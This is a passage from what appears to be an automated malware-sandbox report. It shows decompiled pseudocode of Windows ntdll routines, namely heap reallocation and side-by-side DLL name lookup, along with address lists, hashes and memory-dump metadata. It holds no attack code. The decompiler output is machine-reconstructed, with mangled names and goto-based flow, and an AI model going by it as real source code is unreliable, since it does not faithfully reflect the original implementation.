									E00D116C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0xd47928; // 0x0
								if(__eflags != 0) {
									_t147 = E00C78131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0xd4792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xd4792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E00CB373B();
									} else {
										E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E00CFF719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E00CB373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E00D106F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E00CB373B();
								} else {
									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E00CB373B("Just reallocated block at %p to %x bytes\n",  *0xd47928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xd47928; // 0x0
								if(__eflags != 0) {
									_t173 = E00C78131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E00C7C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E00D0F8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E00C92568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = L00D09AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										L00D0FB7A(_t235, _t246, _t248, 1);
										E00D1098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0xd4792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E00D0F8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E00C92568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0xd4792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xd4792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E00CB373B();
										} else {
											E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E00CFF719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E00CB373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E00D106F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E00CB373B();
								} else {
									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E00CB373B("About to reallocate block at %p to %x bytes\n",  *0xd47928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E00D0E765();
					L72:
					return L00C6DFA1(_t123);
				}
			}




























                                                                                                                                                    0x00d11238
                                                                                                                                                    0x00d11238
                                                                                                                                                    0x00d1123a
                                                                                                                                                    0x00d1123f
                                                                                                                                                    0x00d11244
                                                                                                                                                    0x00d11247
                                                                                                                                                    0x00d1124a
                                                                                                                                                    0x00d11250
                                                                                                                                                    0x00d1125a
                                                                                                                                                    0x00d11270
                                                                                                                                                    0x00d11273
                                                                                                                                                    0x00d1127a
                                                                                                                                                    0x00d11281
                                                                                                                                                    0x00d11286
                                                                                                                                                    0x00d11288
                                                                                                                                                    0x00d1129a
                                                                                                                                                    0x00d1129d
                                                                                                                                                    0x00d112a0
                                                                                                                                                    0x00d112a2
                                                                                                                                                    0x00d112aa
                                                                                                                                                    0x00d112aa
                                                                                                                                                    0x00d112a4
                                                                                                                                                    0x00d112a4
                                                                                                                                                    0x00d112a4
                                                                                                                                                    0x00d112b9
                                                                                                                                                    0x00d112bc
                                                                                                                                                    0x00d112be
                                                                                                                                                    0x00d11616
                                                                                                                                                    0x00d1161c
                                                                                                                                                    0x00d1161f
                                                                                                                                                    0x00d11623
                                                                                                                                                    0x00d11645
                                                                                                                                                    0x00d1164a
                                                                                                                                                    0x00d11625
                                                                                                                                                    0x00d1163d
                                                                                                                                                    0x00d11642
                                                                                                                                                    0x00d11650
                                                                                                                                                    0x00d11659
                                                                                                                                                    0x00d11663
                                                                                                                                                    0x00d1169f
                                                                                                                                                    0x00d1169f
                                                                                                                                                    0x00d1169f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d112c4
                                                                                                                                                    0x00d112c4
                                                                                                                                                    0x00d112c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d112cd
                                                                                                                                                    0x00d112d1
                                                                                                                                                    0x00d112d9
                                                                                                                                                    0x00d112de
                                                                                                                                                    0x00d112e2
                                                                                                                                                    0x00d112e2
                                                                                                                                                    0x00d112e2
                                                                                                                                                    0x00d112e2
                                                                                                                                                    0x00d112e9
                                                                                                                                                    0x00d112f1
                                                                                                                                                    0x00d112f4
                                                                                                                                                    0x00d112f8
                                                                                                                                                    0x00d11301
                                                                                                                                                    0x00d11301
                                                                                                                                                    0x00d11301
                                                                                                                                                    0x00d11306
                                                                                                                                                    0x00d1130b
                                                                                                                                                    0x00d1130d
                                                                                                                                                    0x00d11516
                                                                                                                                                    0x00d11516
                                                                                                                                                    0x00d11519
                                                                                                                                                    0x00d1151b
                                                                                                                                                    0x00d116a3
                                                                                                                                                    0x00d116a3
                                                                                                                                                    0x00d116a3
                                                                                                                                                    0x00d116a3
                                                                                                                                                    0x00d116a7
                                                                                                                                                    0x00d116ae
                                                                                                                                                    0x00d116b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d116b3
                                                                                                                                                    0x00d11521
                                                                                                                                                    0x00d11527
                                                                                                                                                    0x00d11585
                                                                                                                                                    0x00d1158a
                                                                                                                                                    0x00d1158f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11599
                                                                                                                                                    0x00d115a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d115ad
                                                                                                                                                    0x00d115b4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d115c0
                                                                                                                                                    0x00d115c3
                                                                                                                                                    0x00d115c7
                                                                                                                                                    0x00d115e9
                                                                                                                                                    0x00d115ee
                                                                                                                                                    0x00d115c9
                                                                                                                                                    0x00d115e1
                                                                                                                                                    0x00d115e6
                                                                                                                                                    0x00d115fd
                                                                                                                                                    0x00d115fe
                                                                                                                                                    0x00d11609
                                                                                                                                                    0x00d11579
                                                                                                                                                    0x00d1157b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d1157b
                                                                                                                                                    0x00d1152f
                                                                                                                                                    0x00d11532
                                                                                                                                                    0x00d11536
                                                                                                                                                    0x00d11558
                                                                                                                                                    0x00d1155d
                                                                                                                                                    0x00d11538
                                                                                                                                                    0x00d11550
                                                                                                                                                    0x00d11555
                                                                                                                                                    0x00d11563
                                                                                                                                                    0x00d11571
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11313
                                                                                                                                                    0x00d11316
                                                                                                                                                    0x00d1131c
                                                                                                                                                    0x00d11375
                                                                                                                                                    0x00d1137a
                                                                                                                                                    0x00d1137f
                                                                                                                                                    0x00d11468
                                                                                                                                                    0x00d11472
                                                                                                                                                    0x00d11477
                                                                                                                                                    0x00d1147a
                                                                                                                                                    0x00d1147c
                                                                                                                                                    0x00d11482
                                                                                                                                                    0x00d11482
                                                                                                                                                    0x00d11485
                                                                                                                                                    0x00d11489
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11494
                                                                                                                                                    0x00d11498
                                                                                                                                                    0x00d1149d
                                                                                                                                                    0x00d114a7
                                                                                                                                                    0x00d114aa
                                                                                                                                                    0x00d114ac
                                                                                                                                                    0x00d114ae
                                                                                                                                                    0x00d114af
                                                                                                                                                    0x00d114b0
                                                                                                                                                    0x00d114b0
                                                                                                                                                    0x00d114aa
                                                                                                                                                    0x00d114b5
                                                                                                                                                    0x00d114b9
                                                                                                                                                    0x00d114e3
                                                                                                                                                    0x00d114bb
                                                                                                                                                    0x00d114c1
                                                                                                                                                    0x00d114c3
                                                                                                                                                    0x00d114ca
                                                                                                                                                    0x00d114d3
                                                                                                                                                    0x00d114d3
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114d5
                                                                                                                                                    0x00d114d8
                                                                                                                                                    0x00d114d8
                                                                                                                                                    0x00d114e6
                                                                                                                                                    0x00d114e9
                                                                                                                                                    0x00d114ed
                                                                                                                                                    0x00d114f8
                                                                                                                                                    0x00d114fe
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d114ed
                                                                                                                                                    0x00d11509
                                                                                                                                                    0x00d11511
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11511
                                                                                                                                                    0x00d11385
                                                                                                                                                    0x00d11387
                                                                                                                                                    0x00d1138d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11393
                                                                                                                                                    0x00d11396
                                                                                                                                                    0x00d1139b
                                                                                                                                                    0x00d113a5
                                                                                                                                                    0x00d113a8
                                                                                                                                                    0x00d113aa
                                                                                                                                                    0x00d113ab
                                                                                                                                                    0x00d113ac
                                                                                                                                                    0x00d113ad
                                                                                                                                                    0x00d113ad
                                                                                                                                                    0x00d113a8
                                                                                                                                                    0x00d113b2
                                                                                                                                                    0x00d113b6
                                                                                                                                                    0x00d113c9
                                                                                                                                                    0x00d113b8
                                                                                                                                                    0x00d113be
                                                                                                                                                    0x00d113be
                                                                                                                                                    0x00d113cc
                                                                                                                                                    0x00d113cf
                                                                                                                                                    0x00d113d2
                                                                                                                                                    0x00d113dd
                                                                                                                                                    0x00d113e3
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113eb
                                                                                                                                                    0x00d113ee
                                                                                                                                                    0x00d113f1
                                                                                                                                                    0x00d113f3
                                                                                                                                                    0x00d113fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11403
                                                                                                                                                    0x00d1140a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11412
                                                                                                                                                    0x00d11415
                                                                                                                                                    0x00d11418
                                                                                                                                                    0x00d1143a
                                                                                                                                                    0x00d1143f
                                                                                                                                                    0x00d1141a
                                                                                                                                                    0x00d11432
                                                                                                                                                    0x00d11437
                                                                                                                                                    0x00d11444
                                                                                                                                                    0x00d1144e
                                                                                                                                                    0x00d1144f
                                                                                                                                                    0x00d1145a
                                                                                                                                                    0x00d1145f
                                                                                                                                                    0x00d11462
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d113f1
                                                                                                                                                    0x00d11324
                                                                                                                                                    0x00d11327
                                                                                                                                                    0x00d1132b
                                                                                                                                                    0x00d1134d
                                                                                                                                                    0x00d11352
                                                                                                                                                    0x00d1132d
                                                                                                                                                    0x00d11345
                                                                                                                                                    0x00d1134a
                                                                                                                                                    0x00d11357
                                                                                                                                                    0x00d11358
                                                                                                                                                    0x00d11366
                                                                                                                                                    0x00d1136b
                                                                                                                                                    0x00d1136e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d1136e
                                                                                                                                                    0x00d1130d
                                                                                                                                                    0x00d112be
                                                                                                                                                    0x00d1128a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d1125c
                                                                                                                                                    0x00d1125c
                                                                                                                                                    0x00d1125f
                                                                                                                                                    0x00d11262
                                                                                                                                                    0x00d11265
                                                                                                                                                    0x00d11266
                                                                                                                                                    0x00d116b6
                                                                                                                                                    0x00d116bb
                                                                                                                                                    0x00d116bb

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                    • API String ID: 0-3744532478
                                                                                                                                                    • Opcode ID: fdc26c928810dc17ec4e111e383c14cdf5a47e32ef2a1b94917efccc43655c26
                                                                                                                                                    • Instruction ID: 504c0b6e226d22fa11699f91b0b416179312aad22e3cb2c5bd7006f5e1aae973
                                                                                                                                                    • Opcode Fuzzy Hash: fdc26c928810dc17ec4e111e383c14cdf5a47e32ef2a1b94917efccc43655c26
                                                                                                                                                    • Instruction Fuzzy Hash: DEC1E178504281AFDB21EF64D885BEAB7F0EF09710F088058F5959A692CB74E8C5EB71
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C6F3CF, Relevance: 9.2, Strings: 7, Instructions: 466COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00C6F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0xd42088; // 0x777dc194
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				L00C6DFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = L00C6ED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E00C6E1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							L00C7B90D(_t198, _v72);
						}
						return E00C6E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E00C978E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E00C978E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E00C78980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E00CEC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E00C978E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
													E00C78980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = L00C6FBD7(1,  &_v68, 0xc9b024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E00CF77A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E00C978E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E00C78980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E00C978E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E00C78980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
